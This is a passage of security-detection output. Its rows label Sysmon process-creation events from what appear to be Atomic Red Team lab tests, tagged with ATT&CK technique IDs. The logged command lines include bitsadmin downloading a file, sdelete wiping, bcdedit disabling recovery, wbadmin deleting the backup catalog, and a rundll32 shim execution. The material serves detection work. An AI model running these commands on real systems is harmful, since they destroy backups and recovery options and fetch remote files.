<TimeCreated SystemTime=""2019-07-19T14:48:05.365622Z"">
</TimeCreated>
<EventRecordID>3656</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:05.349</Data>
<Data Name=""ProcessGuid"">747F3D96-D825-5D31-0000-0010CF222C00</Data>
<Data Name=""ProcessId"">5808</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
</TimeCreated>
<EventRecordID>1966541</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
<Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
<Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:04.103366Z"">
</TimeCreated>
<EventRecordID>3654</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:04.094</Data>
<Data Name=""ProcessGuid"">747F3D96-D824-5D31-0000-001023F42B00</Data>
<Data Name=""ProcessId"">6736</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:57.274199Z"">
</TimeCreated>
<EventRecordID>3653</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:57.265</Data>
<Data Name=""ProcessGuid"">747F3D96-D81D-5D31-0000-0010D7CD2B00</Data>
<Data Name=""ProcessId"">7080</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sdelete.exe C:\some\file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:57.227966Z"">
</TimeCreated>
<EventRecordID>3652</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:57.189</Data>
<Data Name=""ProcessGuid"">747F3D96-D81D-5D31-0000-0010B8CA2B00</Data>
<Data Name=""ProcessId"">1632</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sdelete.exe C:\some\file.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:52.046322Z"">
</TimeCreated>
<EventRecordID>3651</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:51.972</Data>
<Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-0010C8BA2B00</Data>
<Data Name=""ProcessId"">7040</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} recoveryenabled no&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:51.997980Z"">
</TimeCreated>
<EventRecordID>3649</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:51.899</Data>
<Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-001049B42B00</Data>
<Data Name=""ProcessId"">6216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} recoveryenabled no&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:51.816821Z"">
</TimeCreated>
<EventRecordID>3647</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:51.784</Data>
<Data Name=""ProcessGuid"">747F3D96-D817-5D31-0000-001064AD2B00</Data>
<Data Name=""ProcessId"">6508</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:46.112439Z"">
</TimeCreated>
<EventRecordID>3645</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:46.104</Data>
<Data Name=""ProcessGuid"">747F3D96-D812-5D31-0000-0010AC892B00</Data>
<Data Name=""ProcessId"">2948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:18:58.278752Z"">
</TimeCreated>
<EventRecordID>1966704</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""988"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 23:18:42.516</Data>
<Data Name=""ProcessGuid"">365ABB72-78D2-5C91-0000-0010D8A50200</Data>
<Data Name=""ProcessId"">2572</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-77C4-5C91-0000-0020AD7D0100</Data>
<Data Name=""LogonId"">0x17dad</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-785E-5C91-0000-00103FEA0100</Data>
<Data Name=""ParentProcessId"">1928</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wbadmin.exe delete catalog -quiet&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:45.585327Z"">
</TimeCreated>
<EventRecordID>3641</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:45.569</Data>
<Data Name=""ProcessGuid"">747F3D96-D811-5D31-0000-001000632B00</Data>
<Data Name=""ProcessId"">4500</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wbadmin.exe delete catalog -quiet&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
